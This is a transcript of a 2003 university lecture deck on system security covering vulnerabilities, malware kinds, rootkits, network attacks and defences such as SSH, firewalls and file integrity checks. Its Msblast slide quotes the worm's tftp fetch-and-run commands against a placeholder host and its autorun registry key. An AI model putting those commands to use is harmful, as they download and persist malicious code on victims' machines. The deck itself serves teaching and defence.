System Security - Wright State engineering
Download
Report
Transcript System Security - Wright State engineering
System Security
Prabhaker Mateti
Wright State University
A Few Assessments …
Top 20 Vulnerabilities/ NIPC+FBI+SANS
(May 29, 2003)
W1
W2
W3
W4
W5
W6
W7
W8
W9
WA
Internet Information Services (IIS)
MDAC Remote Data Services
Microsoft SQL Server
NETBIOS -- Unprotected Networking Shares
Anonymous Logon -- Null Sessions
LAN Manager Authentication -- Weak LM Hashing
No Passwords or Weak Passwords
Internet Explorer
Remote Registry Access
Windows Scripting Host
SysSec/SIAC2003
Mateti/WrightStateU
3
Top 20 Vulnerabilities/ NIPC+FBI+SANS
(May 29, 2003)
U1
U2
U3
U4
U5
U6
U7
U8
U9
UA
RPC Remote Procedure Calls
Apache Web Server
Secure Shell (SSH)
SNMP
File Transfer Protocol (FTP)
R-Services -- Trust Relationships
Line Printer Daemon (LPD)
Sendmail
BIND/DNS
No Passwords or Weak Passwords
SysSec/SIAC2003
Mateti/WrightStateU
4
Threats To The National Infrastructures
(Defense Science Board)
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
Incomplete, inquisitive and unintentional blunders.
Hackers driven by technical challenges.
Disgruntled employees or customers seeking revenge.
Criminals interested in personal financial gain or stealing services.
Organized crime with the intent of hiding something or financial gain.
Organized terrorist groups attempting to influence U.S. policy by
isolated attacks.
Foreign espionage agents seeking to exploit information for economic,
political, or military purposes.
Tactical countermeasures intended to disrupt specific weapons or
command structures.
Multifaceted tactical information warfare applied in a broad
orchestrated manner to disrupt a major U.S. military mission.
Large organized groups or nation-states intent on overthrowing the
United States.
SysSec/SIAC2003
Mateti/WrightStateU
5
Just the facts Madam
Security Incidents / CERT
76,404 Jan –June 2003
82,094 all of 2002
“CERT uses the word "incident" as an
administrative term that groups together any
related set of activities; for example, activities in
which the same tool or exploit is used by an
intruder. A single "incident" can involve anything
from a single host computer to a very large
number of host computers, at a single site or at
hundreds of thousands of sites.”
SysSec/SIAC2003
Mateti/WrightStateU
7
Number of Hosts in the DNS
(isc.org Internet Domain Survey, Jan 2003)
Jan 2003
171,638,297
Jul 2002
Jan 2002
162,128,493
147,344,723
Jul 2001
Jan 2001
125,888,197
109,574,429
Jul 2000
Jan 2000
93,047,785
72,398,092
SysSec/SIAC2003
Mateti/WrightStateU
8
SysSec/SIAC2003
Mateti/WrightStateU
9
Terms …
“So you got r00ted.’’
Your machine has been compromised.
root = administrator = super-user
An unauthorized user has obtained root
privileges.
A rootkit may have been installed.
Forensic analyses made with tools
existing on that system are unreliable.
SysSec/SIAC2003
Mateti/WrightStateU
11
Denial of Service (DoS)
We think of computer systems as
providing services to authorized users.
When a system is deliberately made to
crash, or made to run legitimate users'
programs so very slowly that it is
unusable, we refer to it as a "denial of
service attack."
The attacker accomplishes this by
running certain cleverly composed
programs, and is pre-aware of the
consequences.
SysSec/SIAC2003
Mateti/WrightStateU
12
Black Hats v. White Hats
Black hats are the "bad" guys in
that they use their knowledge to
unauthorizedly break into even
more systems, and pass their
knowledge to other insiders.
White hats are the "good" guys:
they are mostly into forensics and
prevention of attacks.
SysSec/SIAC2003
Mateti/WrightStateU
13
Vulnerability, …
Vulnerability: A weakness that can
be exploited to cause damage.
Attack: A method of exploiting a
vulnerability.
Threat: A motivated, capable
adversary that mounts attacks.
SysSec/SIAC2003
Mateti/WrightStateU
14
Hacker v. Attacker v. Intruder
Hacker = One who programs
enthusiastically, even obsessively.
An expert at a particular program, as in
‘a Unix hacker’.
A hacker enjoys exploring the details of
programmable systems and how to
stretch their capabilities.
A hacker has ethics.
SysSec/SIAC2003
Mateti/WrightStateU
15
Viruses
Viruses are "programs" that modify
other programs on a computer,
inserting copies of themselves.
Viruses are not officially programs:
– They cannot run on their own.
– Need to have some host program.
– When the host program is run, the virus
runs.
SysSec/SIAC2003
Mateti/WrightStateU
16
Structure of Viruses
V() {
infectExecutable();
if (triggered()) doDamage();
jump to main of infected program;
}
void infectExecutable() {
file = chose an uninfected executable file;
prepend V to file;
}
void doDamage() { ... }
int triggered() { return (some test? 1 : 0); }
SysSec/SIAC2003
Mateti/WrightStateU
17
Worms
Worms are programs that propagate
from computer to computer on a
network.
Worms can run independently.
Worms may have (different) portions of
themselves running on many different
machines.
Worms do not change other programs,
although they may carry other code
that does.
SysSec/SIAC2003
Mateti/WrightStateU
18
Trojans
A Trojan mimics the functionality
of its namesake legitimate
program.
But has a hidden “agenda.”
Ex: wu-ftpd Trojan - Login with
specific user/password gives a
root shell.
SysSec/SIAC2003
Mateti/WrightStateU
19
Backdoors
Also called trap doors.
Allow unauthorized access to a
system.
The absence of backdoors cannot
be established.
SysSec/SIAC2003
Mateti/WrightStateU
20
Malware
Viruses + Worms + Trojans + …
Any “program” that has a
“malicious” intent …
SysSec/SIAC2003
Mateti/WrightStateU
21
System Security
“System Security” =
Computer Security + Network Security + Internet Security
Trojan Horses, Viruses and Worms
Privacy and Authentication
TCP/IP exploits
Firewalls
Secure Configuration of Personal Machines
Buffer Overflow and Other Bug Exploitation
Writing Bug-free and Secure Software
Secure e-Commerce Transactions
…
SysSec/SIAC2003
Mateti/WrightStateU
22
Current practices, and their
problems
Improper Configuration
Out of the box installations are
rarely properly configured.
Standard user accounts with
standard passwords.
Running unneeded services.
Leaving sensitive files read/writeopen.
SysSec/SIAC2003
Mateti/WrightStateU
24
Fortification
Start with a properly configured
system.
Delete weak or unneeded
components.
Add protective layers.
Keep detailed logs.
SysSec/SIAC2003
Mateti/WrightStateU
25
Hardened OS
Often “equated” with fortification.
Rebuilding an OS from the same
source code but by using a more
rigorous compiler.
Redesigning portions of an OS.
Statically v. dynamically
configured.
SysSec/SIAC2003
Mateti/WrightStateU
26
Rootkits
“A rootkit is a collection of tools and utilities that
attackers use to hide their presence and gather data to
help them infiltrate further across the network. Rootkits
insert backdoors, install Trojans, and patch existing
programs.’’
A rootkit may disable auditing when a certain user is logged
on.
A rootkit could allow anyone to log in if a certain backdoor
password is used.
A rootkit could patch the kernel itself, allowing anyone to run
privileged code if they use a special filename
Installed after the attacker gains access.
Cannot be detected by firewalls or anti-virus scanners.
203 results for search “rootkit’’ on
www.packetstormsecurity.org
SysSec/SIAC2003
Mateti/WrightStateU
27
Rootkits
“Rootkit” was originally a Unix
term, derived from the word
“root”.
Unix rootkits typically replace
system binaries with trojaned
binaries.
The trojaned binaries hide the
attacker activities
SysSec/SIAC2003
Mateti/WrightStateU
28
Windows Rootkit
A Windows rootkit typically replaces
APIs, not binaries.
Any program that calls those replaced
APIs is potentially affected.
The rootkit typically hides itself using
the hacked Windows installation.
A typical Windows rootkit can hide files,
folders, processes, services, and
registry entries
SysSec/SIAC2003
Mateti/WrightStateU
29
Windows Rootkit Examples
null.sys
HE4Hook
Hacker Defender
Slanret
He4Hook
Vanquish
Fu
…
SysSec/SIAC2003
Mateti/WrightStateU
30
Null session
Unauthenticated connection
Empty username, empty password
“Null sessions can *always* be established to NT4, Windows
2000, and Windows XP machines. If the machine's server
service is enabled, and ports 139 or 445 are available, then
you can do a net use with anonymous credentials, and the
system will respond with "Command completed successfully".
This has not changed from NT4 to Win2K to XP.’’ -- [email protected]
SysSec/SIAC2003
Mateti/WrightStateU
31
Linux Rootkit Examples
Linux Rootkit (LRK)
TeLeKit
Adore
Knark
t0rnkit
Kernel Intrusion System (KIS)
…
SysSec/SIAC2003
Mateti/WrightStateU
32
_
_
| |
(_)_ __ _
___ __
| |
| | '_ \| | | \ \/ /
| |___| | | | | |_| |> <
|_____|_|_| |_|\__,_/_/\_\
____
_
_
_ _
___ ___ ___
| _ \ ___
___ | |_| | _(_) |_ |_ _|_ _|_ _|
| |_) / _ \ / _ \| __| |/ / | __| | | | | | |
| _ < (_) | (_) | |_|
<| | |_
| | | | | |
|_| \_\___/ \___/ \__|_|\_\_|\__| |___|___|___|
chfn
Trojaned! User->r00t
chsh
Trojaned! User->r00t
inetd Trojaned! Remote access
login
Trojaned! Remote access
ls
Trojaned! Hide files
du
Trojaned! Hide files
ifconfig
Trojaned! Hide sniffing
netstat
Trojaned! Hide connections
passwd
Trojaned! User->r00t
ps
Trojaned! Hide processes
top
Trojaned! Hide processes
rshd
Trojaned! Remote access
syslogd
Trojaned! Hide logs
linsniffer
Packet sniffer!
fix
File fixer!
z2
Zap2 utmp/wtmp/lastlog eraser!
wted
wtmp/utmp editor!
lled
lastlog editor!
bindshell
port/shell type daemon!
tcpd
Trojaned! Hide connections, avoid denies
SysSec/SIAC2003
Mateti/WrightStateU
33
Msblast.exe
(Aug 12, 2003)
The exploit code is derived from the well known dcom.c exploit.
Exploits the MS DCOM RPC vulnerability using TCP port 135.
Produces a remote command line shell.
Runs the following commands:
Creates the following registry key to run at boot:
tftp -i x.x.x.x GET msblast.exe
start msblast.exe
msblast.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\windows auto update =
'msblast.exe'
The worm will begin to scan the local class B subnet, and will also
generate a random address to begin scanning at, then will
sequentially scan from that point forward incrementing by host
address, class c, class b and class a. It can scan hosts at a rate of 20
per second.
The worm contains the following text, which does not get displayed:
“I just want to say LOVE YOU SAN!! billy gates why do you make this possible ?
Stop making money and fix your software!!”
SysSec/SIAC2003
Mateti/WrightStateU
34
Booting Up
BIOS
OS Kernel
Initialization
User logins
SysSec/SIAC2003
Mateti/WrightStateU
35
boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(9)\WINDOWS
[operating systems]
C:\bootsect\hdc3grub.bin="Booting From FAT32on120GB"
multi(0)disk(0)rdisk(0)partition(3)\WINDOWS="Windows XP Pr
multi(0)disk(0)rdisk(0)partition(9)\WINDOWS="Windows XP Pr
multi(0)disk(0)rdisk(0)partition(14)\WINDOWS="Windows XP P
C:\bootsect\hdc3grub.bin="Linux via Grub"
SysSec/SIAC2003
Mateti/WrightStateU
36
/boot/grub/menu.lst
timeout 10
default 1
title failsafe
kernel (hd0,6)/boot/vmlinuz root=/dev/hda7 failsafe
devfs=nomount hdc=ide-scsi acpi=off
initrd (hd0,6)/boot/initrd.img
title linux-smp
kernel (hd0,6)/boot/vmlinuz-smp root=/dev/hda7 devfs=mount
hdc=ide-scsi acpi=off
initrd (hd0,6)/boot/initrd-smp.img
title windows
root (hd0,0)
chainloader +1
SysSec/SIAC2003
Mateti/WrightStateU
37
Human User Authentication
Something you know
Something you have
(e.g., a password or other secret);
(e.g., smart card, credit card);
Something you are
(e.g., fingerprints, retinal scan, voice
print).
SysSec/SIAC2003
Mateti/WrightStateU
38
Passwords
Weak passwords; social
engineering.
telnet, ftp, … passwords travel the
network in the clear; can be
sniffed.
One Time Passwords
SysSec/SIAC2003
Mateti/WrightStateU
39
Cryptography
"Computationally Infeasible”
N = 2^a * 3^b * 5^c * 7^d * ...
One way hash function
– takes a variable-length input
sequence of bytes and converts it into
a fixed-length sequence.
– designed to be computationally
infeasible to reverse the process
SysSec/SIAC2003
Mateti/WrightStateU
40
Symmetric Keys
sender and receiver of a message
share a single, common key.
If ct = encryption (pt, key), then
pt = decryption (ct, key).
DES
IDEA
Blowfish
SysSec/SIAC2003
Mateti/WrightStateU
41
Public and Private Keys
a public key known to everyone, and a
private or secret key known only to the
recipient of the message
The two keys are mathematically
related, yet it is computationally
infeasible to deduce one from the other.
A global registry of public keys is
needed
RSA
SysSec/SIAC2003
Mateti/WrightStateU
42
Man-in-the-Middle Attack
The public key-based communication between say Alice and Bob is
vulnerable.
Let us assume that Mallory, a cracker, not only can listen to the traffic
between Alice and Bob, but also can modify, delete, and substitute
Alice's and Bob's messages, as well as introduce new ones. Mallory
can impersonate Alice when talking to Bob and impersonate Bob when
talking to Alice. Here is how the attack works.
Bob sends Alice his public key. Mallory intercepts the key and sends
her own public key to Alice.
Alice generates a random session key, encrypts it with "Bob’s" public
key (which is really Mallory's), and sends it to Bob.
Mallory intercepts the message. He decrypts the session key with his
private key, encrypts it with Bob's public key, and sends it to Bob.
Bob receives the message thinking it came from Alice. He decrypts it
with his private key and obtains the session key.
Alice and Bob start exchanging messages using the session key.
Mallory, who also has that key, can now decipher the entire
conversation.
SysSec/SIAC2003
Mateti/WrightStateU
43
Buffer Overflow
“Quick: What's the computer vulnerability of the decade? It's not the
Y2K bug, according to computer science and security analysts, but a
security weakness known as the buffer overflow .”
Executable code is injected on to the runtime
stack.
The return address that was on the stack is
modified to point to the beginning of this
code.
The executable code chosen produces a shell.
A root-privileged program is so exploited; so,
you are r00ted.
SysSec/SIAC2003
Mateti/WrightStateU
44
Buffer Overflow
Many of the Top 20 vulnerabilities
are buffer overflow problems.
Caused by a simple class of
programming errors.
C and its promiscuous style.
SysSec/SIAC2003
Mateti/WrightStateU
45
Network Security
Ethernet is a broadcast medium.
Packet switching.
SysSec/SIAC2003
Mateti/WrightStateU
46
Security of the Connection
Least secure: Wireless networking
Second least secure: Always-on
wired connections
Second most secure: Intermittent
wired connections (dial-up)
Most secure: Never connected.
SysSec/SIAC2003
Mateti/WrightStateU
47
TCP/IP Design Problems
Designed with too little concern for
security.
All data, including various fields in
the protocol headers, are sent in
the clear.
Sender and Receiver in the packet
can be spoofed.
SysSec/SIAC2003
Mateti/WrightStateU
48
IP4 Spoofing
IP address: a.b.c.d, 4-bytes.
IP packet contains the IP addresses of
sender and receiver.
Everything in the clear.
IP spoofing replaces the IP address of
(usually) the sender or (in rare cases)
the destination with a different address.
Services that authenticate based on the
IP addresses are vulnerable.
RPC, NFS, r-commands (rlogin, rsh, rcp, etc.), X
windows, …
SysSec/SIAC2003
Mateti/WrightStateU
49
IP Fragment Attacks
When packets are too large to be sent in a single IP
packet, due to interface hardware limitations for
example, they can be split up by an intermediate router.
The final destination will reassemble all the fragments of
an IP packet.
Attackers create artificially fragmented packets in order
to circumvent firewalls that do not perform packet
reassembly.
In the IP layer implementations of nearly all OS, there
are bugs in the reassembly code.
Attackers create fragments that trigger these bugs.
SysSec/SIAC2003
Mateti/WrightStateU
50
IPsec
Data Confidentiality: IPSec sender can encrypt packets
before transmitting them across a network.
Data Integrity: IPSec receiver can authenticate packets
sent by the IPSec sender to ensure that the data has
not been altered during transmission.
Data Origin Authentication: IPSec receiver can
authenticate the source of the IPSec packets sent. This
service is dependent upon the data integrity service.
Anti-Replay: IPSec receiver can detect and reject
replayed packets.
Two encryption modes: Transport and Tunnel.
SysSec/SIAC2003
Mateti/WrightStateU
51
IP6
Expanded Addressing Capabilities
Header Format Simplification
Improved Support for Extensions
and Options
Flow Labeling Capability
Authentication and Privacy
Capabilities
SysSec/SIAC2003
Mateti/WrightStateU
52
TCP Exploits
The SYN Flood
Connection Killing by RST
Closing a Connection by FIN
Connection Hijacking
SysSec/SIAC2003
Mateti/WrightStateU
53
Covert Channels
Sending of “data” not in the
payload, but via other “places.”
Headers.
Sequence numbers.
SysSec/SIAC2003
Mateti/WrightStateU
54
Probing
Port Scanning is one of the most
popular among the reconnaissance
techniques.
Find open ports
Fingerprint the OS
Stealth scan, Bounce scan, …
nmap
SysSec/SIAC2003
Mateti/WrightStateU
55
Sniffers
A packet sniffer is a program that
eavesdrops on the network traffic.
It copies packets as they pass the NIC.
An NIC in the normal mode reads
packets destined to its specific MAC
address, and all other packets are
ignored.
An NIC in promiscuous mode, receives
all packets regardless of the MAC
address.
SysSec/SIAC2003
Mateti/WrightStateU
56
Well known Trojan Ports
sample
22
23
41
41
456
901
999
6712
8879
27444
40412
65535
SysSec/SIAC2003
TCP
Shaft
TCP
Fire Hacker
TCP
Deep Throat
TCP
Deep Throat
TCP
Hacker's Paradise
TCP
Backdoor.Devil
TCP
DeepThroat
TCP
Sub Seven
TCP UDP BackOrifice 2000
UDP Trin00/TFN2K
TCP
The Spy
TCP
Adore Worm/Linux
Mateti/WrightStateU
57
Distributed Denial of Service (DDoS)
Several machines participate in a
DoS attack of a victim.
These participants are often
compromised innocent machines
serving the “attacks.”
A remote client triggers the attack
servers.
SysSec/SIAC2003
Mateti/WrightStateU
58
DNS Attacks
Domain Name Service protocol is
inherently vulnerable.
DNS cache poisoning.
BIND 8 is the most popular DNS server.
DNS servers running BIND are not up to
date with security patches and software
updates.
On October 21, 2002, 9 of the 13 root
name servers were the target of a
DDoS attack.
SysSec/SIAC2003
Mateti/WrightStateU
59
Protecting Our Systems
Security Software
Secure Shell, PGP, …
Firewall Kits
Tools
– Top 50 Security Tools survey from www.nmap.org
– http://www.packetfactory.net
– nmap, SAINT, …
– tcpdump, ethereal, snort, …
– Password cracking
– Tcpwrapper
SysSec/SIAC2003
Mateti/WrightStateU
61
SSH (Secure Shell)
telnet, rlogin, … do not authenticate the
remote machine; SSH does.
The password that the user types as
part of the login ritual is sent as clear
text by telnet and rlogin; SSH sends it
encrypted.
The data being sent and received by the
RTF is also sent as clear text; SSH
sends and receives it in encrypted form.
SysSec/SIAC2003
Mateti/WrightStateU
62
SSH (Secure Shell)
ssh1 v. ssh2
SSH exploits do exist.
Susceptible to man in the middle attack
Encryption and decryption consumes
computing and elapsed time.
Can be a nuisance. If the remote
system has been legitimately reinstalled
...
SysSec/SIAC2003
Mateti/WrightStateU
63
SSH client and servers
ssh
putty
ttermpro
openssh
SysSec/SIAC2003
Mateti/WrightStateU
64
VPN (Virtual Private Network)
Data travels over public networks,
usually the Internet.
The information needed to allow the
data packets to be routed between the
source node and the destination node is
available to the public medium as in
ordinary TCP/IP traffic,
But, all other information is encrypted.
PPTP, L2TP, IPsec
SysSec/SIAC2003
Mateti/WrightStateU
65
File Integrity
“Is the file what I installed? Did it
change?”
Time stamps, file size, … are not
reliable.
MD5 checksums.
The MD5 algorithm takes as input an arbitrary
length byte sequence and produces a 16-byte
"fingerprint" or "message digest" of the input. It
is conjectured that it is computationally infeasible
to produce two messages having the same
message digest, or to produce any message
having a given pre-specified target message
digest.
SysSec/SIAC2003
Mateti/WrightStateU
66
Scanning for “Viruses”
Scanners hook themselves in the
read/write methods of the file sys.
Search for patterns in the file
content.
Search for specific file names, …
Can yield false positives.
Can miss identifying malware.
SysSec/SIAC2003
Mateti/WrightStateU
67
Packet Filters
Drop packets based on matching
certain parts: IP addresses, port
numbers, protocols, flags.
Network Address Translation - NAT
IP port forwarding
iptables -A FORWARD -d ! 192.168.17.0/24 -i eth1 -j
prvt-extrn iptables -A FORWARD -s 130.108.17.0/24 -i
eth2 -j dmz-extrn iptables -A FORWARD -d
130.108.17.0/24 -i eth0 -j extrn-dmz iptables -A
FORWARD -j DROP -l
SysSec/SIAC2003
Mateti/WrightStateU
68
Firewalls
Packet filters
Bastion Host
Proxy services
Stateful Inspection
Three Myths of Firewalls
Firewalls make the assumption that the only way in or
out of a corporate network is through the firewalls; that
there are no "back doors" to your network.
Firewalls make the assumption that all of the bad guys
are on the outside of the firewall, and everyone on the
inside of the can be considered trustworthy.
With macros, JavaScript, Java, … executable fragments
can be embedded inside data.
SysSec/SIAC2003
Mateti/WrightStateU
69
Windows XP Built-in “Firewall”
SysSec/SIAC2003
Mateti/WrightStateU
70
Windows XP Built-in “Firewall”
SysSec/SIAC2003
Mateti/WrightStateU
71
Intrusion Detection
Detect probes.
Constantly check file integrity.
Constantly check which ports are
open and why.
Keep detailed logs of suspicious
activity on a separate system.
SysSec/SIAC2003
Mateti/WrightStateU
72
Amazon.com book search results
(2003/08/26)
Network security
Internet security
Computer security
System security
Homeland security
Security
SysSec/SIAC2003
Mateti/WrightStateU
813
1009
2871
1521
80
32000
73
Web Sites
“There is an oceanic amount of
material on network security
available over the Internet.”
-- A Web Page.
How do we define a “Security Web
Site”?
1000+ web sites
SysSec/SIAC2003
Mateti/WrightStateU
74
A Few Chosen Security Websites
www.incidents.org
www.cert.org
www.cerias.purdue.edu
www.securityfocus.com
lwn.net/security
www.microsoft.com/security
www.phrack.org
SysSec/SIAC2003
Mateti/WrightStateU
75
Mateti/Internet Security Links
CEG 429 Home Page
www.cs.wright.edu/~pmateti/Courses/429
[local-link]
OSIS Lab Home Page
www.cs.wright.edu/~pmateti/OSIS
[local-link]
Support Web Site
www.cs.wright.edu/~pmateti/InternetSecurity/
[local-link]
SysSec/SIAC2003
Mateti/WrightStateU
76